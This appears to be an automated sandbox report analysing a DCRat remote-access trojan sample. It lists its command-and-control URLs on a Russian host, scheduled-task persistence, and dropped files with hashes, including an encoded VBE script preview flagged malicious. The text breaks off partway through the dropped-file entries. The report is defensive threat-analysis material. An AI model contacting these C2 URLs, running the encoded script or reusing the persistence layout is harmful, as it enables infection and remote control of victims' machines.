            http://cy98085.tw1.ru/d08a562e.php?BUISt3=gMc0F&6MLl4TR7bW=lK7at6jiv9hnPMHdbskIx3H&JkwIAjLj8Zrj5q=Q2STSZi6ZxzzP0N4rChRJJbhM&b7b99a30519e3c2e292a564e824776d3=5b034698153668d1ec1ed7aaf90dfff6&e14aa04c57d43a589b010571fdc09bbd=wNmhzMkV2NkNWOjZDM2YTMjZWYjRGZyETM0YDOwQjMmlzMwATYyIGM&BUISt3=gMc0F&6MLl4TR7bW=lK7at6jiv9hnPMHdbskIx3H&JkwIAjLj8Zrj5q=Q2STSZi6ZxzzP0N4rChRJJbhM0%Avira URL Cloudsafe
            http://cy98085.tw1.ru/@=UmM2UTY4ADZ0%Avira URL Cloudsafe
            http://cy98085.tw1.ru/d08a562e.php?yQ3XIlbSUpXqy1hW=xAqVQRf3SN3DgEtr&eLjFvqzMP7WkiU=gUm2mIi8Xe0XiOxk0%Avira URL Cloudsafe
            http://cy98085.tw1.ru/@=UmM2UTY4ADZ2%VirustotalBrowse

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            cy98085.tw1.ru
            		185.114.245.123
            		truetrue
              		unknown

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              http://cy98085.tw1.ru/d08a562e.php?yQ3XIlbSUpXqy1hW=xAqVQRf3SN3DgEtr&eLjFvqzMP7WkiU=gUm2mIi8Xe0XiOxko8YWVwYCU&71b8053f92a6f3b969e0cc7eb346bdc8=QN3QjMlFGZ2IzYkFTO3QGOkBDMzMDMmVWZwYTOmVWOldjMlJWM0kjYzQjM3ATO5cDNxIzNwIzM&e14aa04c57d43a589b010571fdc09bbd=QNlVmN0UjNyMzMwAjYkRmNwQ2N2ETN1QmNwMGOxQzN2EzYiZTZidTY&1897097195362e5524f24dd6cd4188d9=0VfiIiOiQDM4UjY1gTZiFmY2EzMmNjZwMGMjNDMxEzY3QDZkJTZiwiIlFGOzYWZhdjM4kzMmVmNlJGN5MzMhZ2MxEjZ5EGN5U2YjRmY0M2NxIiOiUDMlJjY0YmMyQjYlRDZwImZygTNzU2NjdDMhhDNhZTNiwiIyUTN4YGM3EmZ3EDO1cjNzYGMkVWMyQTZxYjMygTYjJmZ0EWZwgDOxIiOiczNxE2YmZGMiNmYlBzYhFzYmhTM1YGMzkTZ4EzNmhzYis3Wtrue
              • Avira URL Cloud: safe
              		unknown
              http://cy98085.tw1.ru/d08a562e.php?BUISt3=gMc0F&6MLl4TR7bW=lK7at6jiv9hnPMHdbskIx3H&JkwIAjLj8Zrj5q=Q2STSZi6ZxzzP0N4rChRJJbhM&b7b99a30519e3c2e292a564e824776d3=5b034698153668d1ec1ed7aaf90dfff6&e14aa04c57d43a589b010571fdc09bbd=wNmhzMkV2NkNWOjZDM2YTMjZWYjRGZyETM0YDOwQjMmlzMwATYyIGM&BUISt3=gMc0F&6MLl4TR7bW=lK7at6jiv9hnPMHdbskIx3H&JkwIAjLj8Zrj5q=Q2STSZi6ZxzzP0N4rChRJJbhMtrue
              • Avira URL Cloud: safe
              		unknown
              http://cy98085.tw1.ru/@=UmM2UTY4ADZtrue
              • 2%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameportperf.exe, 00000006.00000002.2222640406.0000000002BC0000.00000004.00000800.00020000.00000000.sdmp, dfVXJbANbh.exe, 00000014.00000002.3401292480.0000000002511000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                http://cy98085.tw1.ru/dfVXJbANbh.exe, 00000014.00000002.3401292480.0000000002511000.00000004.00000800.00020000.00000000.sdmptrue
                • Avira URL Cloud: safe
                		unknown
                https://www.maxmind.comdfVXJbANbh.exe, 00000014.00000002.3401292480.0000000002645000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  http://cy98085.tw1.rudfVXJbANbh.exe, 00000014.00000002.3401292480.0000000002600000.00000004.00000800.00020000.00000000.sdmptrue
                  • Avira URL Cloud: safe
                  		unknown
                  http://cy98085.tw1.ru/d08a562e.php?yQ3XIlbSUpXqy1hW=xAqVQRf3SN3DgEtr&eLjFvqzMP7WkiU=gUm2mIi8Xe0XiOxkdfVXJbANbh.exe, 00000014.00000002.3401292480.0000000002600000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown

                  World Map of Contacted IPs

                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs

                  Public IPs

                  IPDomainCountryFlagASNASN NameMalicious
                  185.114.245.123
                  		cy98085.tw1.ruRussian Federation
                  		9123TIMEWEB-ASRUtrue

                  General Information

                  Joe Sandbox version:41.0.0 Charoite
                  Analysis ID:1561293
                  Start date and time:2024-11-23 02:19:05 +01:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 7m 48s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:44
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:DCRatBuild.exe
                  Detection:MAL
                  Classification:mal100.troj.evad.winEXE@46/27@1/1
                  EGA Information:
                  • Successful, ratio: 16.7%
                  HCA Information:
                  • Successful, ratio: 59%
                  • Number of executed functions: 313
                  • Number of non-executed functions: 89
                  Cookbook Comments:
                  • Found application associated with file extension: .exe

                  Warnings

                  • Exclude process from analysis (whitelisted): dllhost.exe, RuntimeBroker.exe, backgroundTaskHost.exe
                  • Excluded IPs from analysis (whitelisted): 23.218.208.109
                  • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, tse1.mm.bing.net, g.bing.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, fe3cr.delivery.mp.microsoft.com, ris.api.iris.microsoft.com, ocsp.digicert.com, e16604.g.akamaiedge.net, prod.fs.microsoft.com.akadns.net
                  • Execution Graph export aborted for target System.exe, PID 7308 because it is empty
                  • Execution Graph export aborted for target System.exe, PID 7336 because it is empty
                  • Execution Graph export aborted for target dfVXJbANbh.exe, PID 7248 because it is empty
                  • Execution Graph export aborted for target dfVXJbANbh.exe, PID 7288 because it is empty
                  • Execution Graph export aborted for target portperf.exe, PID 3968 because it is empty
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size exceeded maximum capacity and may have missing behavior information.
                  • Report size exceeded maximum capacity and may have missing disassembly code.
                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.

                  Simulations

                  Behavior and APIs

                  TimeTypeDescription
                  02:20:05Task SchedulerRun new task: dfVXJbANbh path: "C:\Program Files (x86)\microsoft.net\Primary Interop Assemblies\dfVXJbANbh.exe"
                  02:20:05Task SchedulerRun new task: dfVXJbANbhd path: "C:\Program Files (x86)\microsoft.net\Primary Interop Assemblies\dfVXJbANbh.exe"
                  02:20:05Task SchedulerRun new task: System path: "C:\Program Files\7-Zip\Lang\System.exe"
                  02:20:05Task SchedulerRun new task: SystemS path: "C:\Program Files\7-Zip\Lang\System.exe"
                  02:20:07Task SchedulerRun new task: RuntimeBroker path: "C:\Windows\SystemTemp\Crashpad\RuntimeBroker.exe"
                  02:20:07Task SchedulerRun new task: RuntimeBrokerR path: "C:\Windows\SystemTemp\Crashpad\RuntimeBroker.exe"
                  20:20:06API Interceptor1875287x Sleep call for process: dfVXJbANbh.exe modified

                  Joe Sandbox View / Context

                  IPs

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  185.114.245.123CPYEzG7VGh.exeGet hashmaliciousDCRatBrowse

                    Domains

                    No context

                    ASNs

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    TIMEWEB-ASRUguia_luqf.vbsGet hashmaliciousUnknownBrowse
                    • 92.53.116.138
                    guia_evfs.vbsGet hashmaliciousUnknownBrowse
                    • 92.53.116.138
                    file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                    • 185.178.47.86
                    CPYEzG7VGh.exeGet hashmaliciousDCRatBrowse
                    • 185.114.245.123
                    DividasAtivas_tgj.vbsGet hashmaliciousUnknownBrowse
                    • 92.53.116.138
                    QYP0tD7z0c.exeGet hashmaliciousDCRatBrowse
                    • 92.53.106.114
                    EBalcao_ysx.vbsGet hashmaliciousUnknownBrowse
                    • 92.53.116.138
                    kQyd2z80gD.exeGet hashmaliciousDCRatBrowse
                    • 92.53.106.114
                    phc.exeGet hashmaliciousUnknownBrowse
                    • 92.53.116.138
                    Simple.exeGet hashmaliciousUnknownBrowse
                    • 92.53.116.138

                    JA3 Fingerprints

                    No context

                    Dropped Files

                    No context

                    Created / dropped Files

                    C:\ChainBlocksurrogateagentFont\IQYI1ZQqki4.vbe

                    Download File
                    Process:C:\Users\user\Desktop\DCRatBuild.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):230
                    Entropy (8bit):5.876818190822531
                    Encrypted:false
                    SSDEEP:6:GDwqK+NkLzWbH+8nZNDd3RL1wQJRivGkT/hBOs:GaMCzWL+4d3XBJhI/h
                    MD5:B3E0630669E9F81B3E57048E6AF1E015
                    SHA1:650473DC5A9144A544FB53AF84EF4FC8E0A72320
                    SHA-256:01543751A00DB2BBBAAF366AA712303363C484C1F9970AE04857F6703473A5E2
                    SHA-512:AC7E7FDF1FB92273A08E030D9F4B407FAA4B759C85932A7A2463DF92F83F5BB7B596B9D8B2E0ACEA1A20305903F4E425E7A82EDF4F12C9CA60C56F67BCA1236F
                    Malicious:true
                    Antivirus:
                    • Antivirus: Avira, Detection: 100%
                    Preview:#@~^zQAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2vcT!Zb@#@&j.Y,./4?4nV^PxP;DnCD+r(%+1Y`r.jmMkaY ?4n^VE#@#@&.ktj4.VV ]!x~J;lJZ4mk.AVKm0dEMDGomYnCT+xDoW.Yz$#AYgAD;{NG/;G5};(qRmBixNR8CDJSPZS,0C^/.YUIAAA==^#~@.

                    C:\ChainBlocksurrogateagentFont\d08fa8653d53e7

                    Download File
                    Process:C:\ChainBlocksurrogateagentFont\portperf.exe
                    File Type:ASCII text, with no line terminators
                    Category:dropped
                    Size (bytes):281
                    Entropy (8bit):5.813384628468723
                    Encrypted:false
                    SSDEEP:6:KAWO8ItJaVvqGORjLRjaJLVKzajRUH56gcDlQMWqKgCLP46omHjFXrz:KAWO8QJJx1aJWowcDKOh6omDFbz
                    MD5:4171D642B9AA90C325B6F19AA89C38B5
                    SHA1:BFB202AD8D1918B979F22206ADF91AD36D8FE62A
                    SHA-256:F021C4340CA6DCEBB9F9CB7223D1E7B77F0D10EFB051AF38A584C74307DA1BF3
                    SHA-512:2E8B79C189B577A0E75109CA7E23D600D37B1053D833D3A3BCA2E41F7D069559EF73B3C166B5A218A456FD5D5C9F0A7A2201A79F1BF16A9C748AD006E82205BA
                    Malicious:false
                    Preview:dtGhlXpMCAltJHNNpqbeWcgXjHT7XjuviemPHheH3h6IpWYGK25dzd4BMs7dDszdPzKpe8GILTlzfYsNtNwenR6FklCYjBELrd3zLtlMwxSf2EfyAuuz5V072FE35riKOZICf2B9lkrz9bNgGOYzQOQVm57GosREPHQc6cSItuOUnA8b2iwqTt3AJwZj55U3Tmk1Kuko5QGfA5sm7fOG5kvfOQSKCsNxaVBBZGQH8IvDnXAOExmZrO7t1Fn4balMCSFp3rN0OGIxyr20QEFPGxGLX

                    C:\ChainBlocksurrogateagentFont\dfVXJbANbh.exe

                    Download File
                    Process:C:\ChainBlocksurrogateagentFont\portperf.exe
                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                    Category:dropped
                    Size (bytes):848896
                    Entropy (8bit):6.083659084534403
                    Encrypted:false
                    SSDEEP:24576:b3eblFYt2e9esxtDyVjD7D1NauFd3YP+ow7:b2rejxtDydhc
                    MD5:A054982F7E12C1F491ECCD25D9C1B5D7
                    SHA1:B3C78B1C7C8A95486DB06E39F56910D0F3E90996
                    SHA-256:4B6302643800DAFE4629960E243BA26663F8510C42F4EAF656B1CC510406E408
                    SHA-512:D57BE5AF22F21E7C20D330F5714DDCF1936152E3D9BD2254C1A2C83F420BFE183AE204C871B1CE2D8F5361A1661AFBE39A9B5BEC12FB00195A8C0B967977A925
                    Malicious:true
                    Antivirus:
                    • Antivirus: Avira, Detection: 100%
                    • Antivirus: Avira, Detection: 100%
                    • Antivirus: Avira, Detection: 100%
                    • Antivirus: Avira, Detection: 100%
                    • Antivirus: Avira, Detection: 100%
                    • Antivirus: Avira, Detection: 100%
                    • Antivirus: Avira, Detection: 100%
                    • Antivirus: Joe Sandbox ML, Detection: 100%
                    • Antivirus: Joe Sandbox ML, Detection: 100%
                    • Antivirus: Joe Sandbox ML, Detection: 100%
                    • Antivirus: Joe Sandbox ML, Detection: 100%
                    • Antivirus: Joe Sandbox ML, Detection: 100%
                    • Antivirus: Joe Sandbox ML, Detection: 100%
                    • Antivirus: Joe Sandbox ML, Detection: 100%
                    • Antivirus: ReversingLabs, Detection: 74%
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ........@.. .......................`............@.....................................K.... .......................@....................................................... ............... ..H............text....... ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\ChainBlocksurrogateagentFont\portperf.exe

                    Download File
                    Process:C:\Users\user\Desktop\DCRatBuild.exe
                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                    Category:dropped
                    Size (bytes):848896
                    Entropy (8bit):6.083659084534403
                    Encrypted:false
                    SSDEEP:24576:b3eblFYt2e9esxtDyVjD7D1NauFd3YP+ow7:b2rejxtDydhc
                    MD5:A054982F7E12C1F491ECCD25D9C1B5D7
                    SHA1:B3C78B1C7C8A95486DB06E39F56910D0F3E90996
                    SHA-256:4B6302643800DAFE4629960E243BA26663F8510C42F4EAF656B1CC510406E408
                    SHA-512:D57BE5AF22F21E7C20D330F5714DDCF1936152E3D9BD2254C1A2C83F420BFE183AE204C871B1CE2D8F5361A1661AFBE39A9B5BEC12FB00195A8C0B967977A925
                    Malicious:true
                    Antivirus:
                    • Antivirus: Avira, Detection: 100%
                    • Antivirus: Joe Sandbox ML, Detection: 100%
                    • Antivirus: ReversingLabs, Detection: 74%
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ........@.. .......................`............@.....................................K.... .......................@....................................................... ............... ..H............text....... ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\ChainBlocksurrogateagentFont\qVwtNBtq7doCC7qZCII8cJUJd.bat

                    Download File
                    Process:C:\Users\user\Desktop\DCRatBuild.exe
                    File Type:ASCII text, with no line terminators
                    Category:dropped
                    Size (bytes):46
                    Entropy (8bit):4.325313793475192
                    Encrypted:false
                    SSDEEP:3:I5vnFaxAAKj1n:I7aS1
                    MD5:00AFE3A3FCC7952DFADC97502A3AECAC
                    SHA1:6B7E7835CD437E437C91AD91255EFE5C8F24C0F4
                    SHA-256:5F60A9046FF7978E0518AD160509409A8818DBEA53FAA79C5D93364DD8D70F95
                    SHA-512:9AF6ECB3FF68382C633E640D29E86D17597FAA2AB712F75697BDF98596C6B17146991EC88FD94DF8C65A8FA6AE60E763A66747CF0BE4AE37D60BEB1E8FF87CC3
                    Malicious:false
                    Preview:"C:\ChainBlocksurrogateagentFont\portperf.exe"

                    C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\d08fa8653d53e7

                    Download File
                    Process:C:\ChainBlocksurrogateagentFont\portperf.exe
                    File Type:ASCII text, with very long lines (597), with no line terminators
                    Category:dropped
                    Size (bytes):597
                    Entropy (8bit):5.867272612161713
                    Encrypted:false
                    SSDEEP:12:xfnBXEMTLvtILnkUHLQAMdQK+EFHzd8gVBjNwP9hF/KsHoP1jT2YNnZyUbu:xfBxrtykrfbFTdPVB2THoP1H26nZ0
                    MD5:A6D33A0FEA067787A580018E536C060C
                    SHA1:D85F3E7B3E13AB7177E4B39E4A2C58BD5231F3BF
                    SHA-256:EEB75D5285E8BA8BD81630EED86F2B6F731C8224337CB40C3CD121BEDDDA18E4
                    SHA-512:4B02E2BE150A272C51B2672EE7EFD24A067C6C094D72F603C36DA89FDE792DC7D4442AE0879C72D9203C6ED2FBB1BCBB20A396FD933AE00D32041591697397F8
                    Malicious:false
                    Preview:bBlcY6nv6DfLNKpYxzrLK0DAZqyBsQbx4E0DXS3SYBdPEyQGlBHhS5Zk8kDsHlDqmrQJTlAe5YwJXx5lasarI3e8oPFxPLLw8xnXhGx9Anl3JQNKpcRZLVhsMReDgNPuN9KkKhEU5aqfRlzXC4Hx3wlmP5KPltdxY1qJGnAHY7dvpCalbHBlGb0bYhUOXysL73Ha4qRZ49Z6Sz7Nejxes1q6AOviSvujOSyw4AqvzlrGC4JikGuxBOdGMKaq4tGJOzrABLSd2BoGJk3GEN7MA6hAysjukA0Gfi1MMJgZxQ5AjX6mRTlrv4IRSrLTli32Khklsq45rhYuBhbav7cQYJVkZk4e7MxOXDzCwU4kZpANfYQuQvioFndBMALHvZ8euJX8sYnbC20tJHEBUJOLoJJtjyzwIwyArfdWBRC1IGmNwu1F5KxlKw0kAnY4j0SQD0Bons9CHXDhh57z6u188Nz5o2VY2IRRyVK5sNbMKvewsTDFpj7y8UR0AG9uWlJ9FwsLvCGsTpyNsDMUyQsTKdSeEU4mNqzilfr6k2TncOfTgEH73p6G20ymdOHbHefmzPlNVQu66F057889M7tiu

                    C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe

                    Download File
                    Process:C:\ChainBlocksurrogateagentFont\portperf.exe
                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                    Category:dropped
                    Size (bytes):848896
                    Entropy (8bit):6.083659084534403
                    Encrypted:false
                    SSDEEP:24576:b3eblFYt2e9esxtDyVjD7D1NauFd3YP+ow7:b2rejxtDydhc
                    MD5:A054982F7E12C1F491ECCD25D9C1B5D7
                    SHA1:B3C78B1C7C8A95486DB06E39F56910D0F3E90996
                    SHA-256:4B6302643800DAFE4629960E243BA26663F8510C42F4EAF656B1CC510406E408
                    SHA-512:D57BE5AF22F21E7C20D330F5714DDCF1936152E3D9BD2254C1A2C83F420BFE183AE204C871B1CE2D8F5361A1661AFBE39A9B5BEC12FB00195A8C0B967977A925
                    Malicious:true
                    Antivirus:
                    • Antivirus: ReversingLabs, Detection: 74%
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ........@.. .......................`............@.....................................K.... .......................@....................................................... ............... ..H............text....... ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Program Files (x86)\Mozilla Maintenance Service\logs\d08fa8653d53e7

                    Download File
                    Process:C:\ChainBlocksurrogateagentFont\portperf.exe
                    File Type:ASCII text, with very long lines (957), with no line terminators
                    Category:dropped
                    Size (bytes):957
                    Entropy (8bit):5.924144135839937
                    Encrypted:false
                    SSDEEP:24:VnCLeui4XOfJILAX27G0ZcPK/CrHut8fCPPW:VCLG4XOfGsbPK/CrV6Pe
                    MD5:BB7A2187469F35C9853FED77E49723A2
                    SHA1:A8DC9CEB1FD122666AD42C563C4022B91AAA96FA
                    SHA-256:29F86B2E60DD5A79658F49F406200551C0F055804477212A283942A7D63E4173
                    SHA-512:A1C5B27C95650BB3D8A101E44A3BA63AFA2F0159A8520DB75D3874BAD62D163A6A3126D38810BF3B889E3E822255921A63BBCB75DC18CE93A90B80DC82D7478C
                    Malicious:false
                    Preview:Fk5eyJRooj5xADfKkTpQCUfz4NwJef2EZNQSosYlBZcwJT9X6237up5vFGjlWHKIq0XxwNg14EOm2tpkNZMlm5TtSfMiIxO3PUFT6MksWCCqbS3Va8Y75ifvhnfRA8sH0VXioWoBzdPk3nS9m1HJZR8qyUvSrSsXT4zF5VrEUXHbT513VfpJ0isiWqtUkWTgv1Q8xMDRKCzCJhW2c16LnihvMQtOlWe7Dlpcp3GIcX9ysqZzU12sZI2NUfwgdzqxh28i24NivytPjsCg144tewh4scIKHjomrLQ0r07ZoT6lZmnldQpj56SvUE0ZwCbMJGiXcMyA7eFLz6eFygr14Frv3efnAhnl2ubSEPJQbomb0H6YjvkPVjSEZwe7qLAZ0eSFeLAjXaZPcQ5wiGDP6YPScW3RvLkQoMkVy03XuB15JClI1rYkHudbPAnISsxLzJlQpj7sMqe4hTIZuuZDxAI3tIGyNvFBOpGAaVdSuqXbPj451NXhStYzBrhhcJebkdq1NI8ZRHTHmqnJOK7AYhseRQ8sy60lL60w2DssO8PLaQMVEXSRMeCDuLk7KQkVRs5qz0RLcOwaRhDADnobniYr3xCrcvi8X44sVgfNGHy7rmvNHj3hlJssTNwByjsrpxCXmVogHbVfua9RCyj21BWOMMYHtdYgZHS4jXlv5WZKxM82Nf9AAz0obyKa7gxnCzFmIFroNx7emMa9Ng4OeYfkQndvNKyYjvI8HVtHyUwM1VCOXLMbmjJoTfVem5bC8j50Ec22wwZKlTs5lOYB8XvAmdpl9Pf32uNSZLK4TTo0J8C9xa2YgaDlx5OkwQ2hQgR1FZfaDdsps50nbpyjWHWcqmfe7kICaHjmqL4X4cUCrY21EkIHbTKJJzKc4AcdVpOlWN7Pvbo3xTuRunaXbAlG6Zd1Bbc390qBKRf0n3WApQWzE2sRkFCVEHo6u

                    C:\Program Files (x86)\Mozilla Maintenance Service\logs\dfVXJbANbh.exe

                    Download File
                    Process:C:\ChainBlocksurrogateagentFont\portperf.exe
                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                    Category:dropped
                    Size (bytes):848896
                    Entropy (8bit):6.083659084534403
                    Encrypted:false
                    SSDEEP:24576:b3eblFYt2e9esxtDyVjD7D1NauFd3YP+ow7:b2rejxtDydhc
                    MD5:A054982F7E12C1F491ECCD25D9C1B5D7
                    SHA1:B3C78B1C7C8A95486DB06E39F56910D0F3E90996
                    SHA-256:4B6302643800DAFE4629960E243BA26663F8510C42F4EAF656B1CC510406E408
                    SHA-512:D57BE5AF22F21E7C20D330F5714DDCF1936152E3D9BD2254C1A2C83F420BFE183AE204C871B1CE2D8F5361A1661AFBE39A9B5BEC12FB00195A8C0B967977A925
                    Malicious:true
                    Antivirus:
                    • Antivirus: ReversingLabs, Detection: 74%
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ........@.. .......................`............@.....................................K.... .......................@....................................................... ............... ..H............text....... ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.0\d08fa8653d53e7

                    Download File
                    Process:C:\ChainBlocksurrogateagentFont\portperf.exe
                    File Type:ASCII text, with very long lines (350), with no line terminators
                    Category:dropped
                    Size (bytes):350
                    Entropy (8bit):5.822026482305975
                    Encrypted:false
                    SSDEEP:6:89VpW8FtWfvqNVahl3T6UVmBoHgZCbEGZgT0vkFQoXQfTKjAatudmNN8JxClMves:epF/WfyHahl3goHYCb3ZgTqOQdfEudvf
                    MD5:DEF4764B729F154D5F230356853AA35E
                    SHA1:9978737A5674FF241A4E6369744265333E2A4B82
                    SHA-256:0A168DDA6057D324E82C4E40BFA9FA0E5FA7322B6A322420CFF6970FE1526905
                    SHA-512:980C4D3BAE27040F4B9F827B14184E626F69D4B5505A054039CB7D9BF3F86FF44F4A88241148FFC7FCCFFD16C6BEF63FDA8B2499CBC12CC29B24DDF6DB76673B
                    Malicious:false
                    Preview:RUUXkwKkGJ4JMwoXUWGPL3Rlh2W2bjRPrgj5usoTngFOX9HrrSOJcvKXDszrZRJg2ocpMtmlrwloyDOhupKIVHx6WL2C374VXjVthbe8qmbpJfj9eR6uGAKu1gTB1ksu2PROreATKMcsqHw1l2ilAJPWYl1BIdHG4qw4OUS9Rnj4ibEttbZ8CGusA5zGn9KrEVy9U2nQkiUWkUx7gIRqDIEx6E3TfLWSc20MnFY1yJYdwXIqH2jereo5RACQ8UvYMB3rekTbtZ14ukBj5NLml1k8O45nCH3eX9RudaLgjIuSmtLq8cVvIJxUb5djpqYlgWguTQGeBpCdGSWetOokwIWNM6Th7l

                    C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.0\dfVXJbANbh.exe

                    Download File
                    Process:C:\ChainBlocksurrogateagentFont\portperf.exe
                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                    Category:dropped
                    Size (bytes):848896
                    Entropy (8bit):6.083659084534403
                    Encrypted:false
                    SSDEEP:24576:b3eblFYt2e9esxtDyVjD7D1NauFd3YP+ow7:b2rejxtDydhc
                    MD5:A054982F7E12C1F491ECCD25D9C1B5D7
                    SHA1:B3C78B1C7C8A95486DB06E39F56910D0F3E90996
                    SHA-256:4B6302643800DAFE4629960E243BA26663F8510C42F4EAF656B1CC510406E408
                    SHA-512:D57BE5AF22F21E7C20D330F5714DDCF1936152E3D9BD2254C1A2C83F420BFE183AE204C871B1CE2D8F5361A1661AFBE39A9B5BEC12FB00195A8C0B967977A925
                    Malicious:true
                    Antivirus:
                    • Antivirus: ReversingLabs, Detection: 74%
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ........@.. .......................`............@.....................................K.... .......................@....................................................... ............... ..H............text....... ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Program Files (x86)\Windows Multimedia Platform\d08fa8653d53e7

                    Download File
                    Process:C:\ChainBlocksurrogateagentFont\portperf.exe
                    File Type:ASCII text, with very long lines (862), with no line terminators
                    Category:dropped
                    Size (bytes):862
                    Entropy (8bit):5.909284571628938
                    Encrypted:false
                    SSDEEP:24:XHTwbWsc9oUW2rGZhheu1Y3s9aKM20hPQccu/9LDm3tCAn25:XHTvCFpZhho3Oa6WlJJYCK25
                    MD5:DAF599B4CF32BD277DD31A78898F373A
                    SHA1:0A397E18CCED9B3001F58CF3167D929E7012FB78
                    SHA-256:8F446675867467B822FA6DB6353FFF58404D03F7C0C080AC41000AF293D39C50
                    SHA-512:530539BF7AA33DCB4BCA9EAD8A9F55DF3651C4CE70DC41FEE1569FD493DFF0D4E68A34E77DC79F2EDC422ACE47002C932E09E01C1CD9D87FDBCB857A5A164212
                    Malicious:false
                    Preview:tdGTNJj90bByzXASiX7ihayJu7fGRS16O4Z3H3sJ87uZ14TYP329uwUTo6jQncsikFj48HLooxjjpZSzoH1XZ1LbkFOKTcggOMyvVYZHsNU7MunPotlflVIt4HT22AVMRDUckgePstoMgNO0c8gj0A53DF1NEgOs2IqJZLpHPWx1q6Mq3da4dvWQIbYfpQLLe6TYhFbQTZTeMDNH2KUlFUOHwZB7wJc9LmWtmyJxCJkEb1EENRme6jFKsMmHEdeJ6UTjrdfEAgj5tJp4V6ufg7ClhMBZMBtipaIGieXuwidZAJaihrwHt9n8RrCebF18xAQTBiV0i9t8dnkYwd2ePlzqxJz0c3SqremA2Hh8W6itQoeoHos8MXtLKjf2teXpqCR8Akfo54HSCFaIoKtyKTeTvbzTlpP1i2CNXfogIDCSPbIFJXNiujfXh7NivMDQpPtJCMuIgNpHQMETTtJObqH9XpqaSFv69wm9r8C6mEBh3XGV33PBCzz8IuwWgT0bcsHejEmUrNlXpkG9jVhYzt4K6o07MqaSNkEKQlvyR5UzNcTiowwLwclsy7h5NpHBwSJFf5t8jtG4ZF6eVSTa3Pgv8WWTD0kmxTC4SNDsCylDWrSsACj5WrHgwYGIja4sIeHGCCLHOkXEndZREnTAQoQFLfI4H5Jm3341kMq81cqvUD3T8zE5G4beOB5h3RATbuKujhr17VJy7evImy5R0Of9baniRIEjbXUj2IubIM7vungtQx4FVsdMOLSJ4IkyQjWkKLPdEeJnQuPy33RdO8Os3HVr0kh9lJeKQ5jFhbA0jz6e6ePA1GkSUnrCzind7KCGPEh8UM6x8YJEK0vVVgHejM0mOg

                    C:\Program Files (x86)\Windows Multimedia Platform\dfVXJbANbh.exe

                    Download File
                    Process:C:\ChainBlocksurrogateagentFont\portperf.exe
                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                    Category:dropped
                    Size (bytes):848896
                    Entropy (8bit):6.083659084534403
                    Encrypted:false
                    SSDEEP:24576:b3eblFYt2e9esxtDyVjD7D1NauFd3YP+ow7:b2rejxtDydhc
                    MD5:A054982F7E12C1F491ECCD25D9C1B5D7
                    SHA1:B3C78B1C7C8A95486DB06E39F56910D0F3E90996
